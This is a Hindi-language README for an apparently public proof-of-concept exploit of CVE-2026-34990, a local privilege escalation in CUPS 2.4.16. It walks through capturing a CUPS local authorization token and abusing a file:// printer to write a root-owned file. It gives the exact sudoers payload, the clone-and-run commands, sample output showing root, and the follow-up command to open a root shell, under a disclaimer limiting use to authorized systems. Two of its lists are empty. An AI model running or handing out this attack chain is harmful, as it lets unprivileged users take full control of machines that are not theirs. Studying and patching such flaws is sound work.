
CVE-2026-34990 के लिए सामान्य PoC - CUPS 2.4.16 में स्थानीय टोकन प्रकटीकरण और मनमाना रूट फ़ाइल ओवरराइट के माध्यम से स्थानीय विशेषाधिकार वृद्धि।
CVE-2026-34990 के लिए एक सामान्य proof-of-concept, जो CUPS 2.4.16 को प्रभावित करने वाली स्थानीय विशेषाधिकार उन्नयन भेद्यता है।
यह exploit प्रदर्शित करता है कि कैसे एक स्थानीय अविशेषाधिकार प्राप्त उपयोगकर्ता CUPS स्थानीय प्रमाणीकरण और प्रिंटर कॉन्फ़िगरेशन व्यवहार का दुरुपयोग करके root के रूप में मनमानी फ़ाइल लेखन प्राप्त कर सकता है और विशेषाधिकारों को बढ़ा सकता है।
CVE-2026-34990 मूल रूप से रिपोर्ट किया गया था:
Asim Viladi Oglu Manizada (@manizada)
मैं इस भेद्यता का खोजकर्ता नहीं हूँ।
यह रिपॉज़िटरी सार्वजनिक रूप से प्रकट तकनीकी जानकारी के आधार पर मेरे अनुकूलित और परीक्षित proof-of-concept कार्यान्वयन को समाहित करती है।
उच्च स्तर पर, exploit श्रृंखला है:
Local unprivileged user
|
v
Create temporary CUPS printer
|
v
Trigger outbound IPP authentication
|
v
Capture Authorization: Local token
|
v
Reuse token against privileged CUPS operations
|
v
Create/persist file:// printer
|
v
Submit print job
|
v
Root-owned arbitrary file write
|
v
Privilege escalation
PoC स्वचालित रूप से वर्तमान स्थानीय उपयोगकर्ता नाम का उपयोग करता है।
उदाहरण के लिए, जब इस रूप में निष्पादित किया जाता है:
alice
तो प्रदर्शन payload लक्षित करता है:
/etc/sudoers.d/alice-pwn
और लिखने का प्रयास करता है:
alice ALL=(ALL) NOPASSWD: ALL
एक सफल exploit को तब सत्यापित किया जा सकता है:
sudo -n id
उदाहरण:
uid=0(root) gid=0(root) groups=0(root)
PoC अपेक्षा करता है:
ipptoollplpstatCUPS संस्करण जाँचें:
cups-config --version
जाँचें कि शेड्यूलर चल रहा है:
lpstat -r
स्थानीय CUPS लिसनर जाँचें:
ss -lnt | grep 631
रिपॉज़िटरी क्लोन करें:
git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC
चलाएँ:
python3 exploit.py
उदाहरण आउटपुट:
[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn
[+] Local token: <LOCAL_TOKEN>
[*] attempt 1: <printer-name>
[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)
[*] next: sudo -n bash
सफल exploitation के बाद:
sudo -n bash
यह PoC जानबूझकर सार्वजनिक रूप से प्रकट CVE के सामान्य कार्यान्वयन के रूप में लिखा गया है।
इसमें निम्नलिखित शामिल नहीं है:
यह कोड निम्नलिखित के लिए प्रदान किया गया है:
इस कोड का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट प्राधिकरण है।
लेखक इस सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार नहीं है।
भेद्यता खोज:
Asim Viladi Oglu Manizada (@manizada)
PoC अनुकूलन, परीक्षण, और दस्तावेज़ीकरण:
Noor Khalil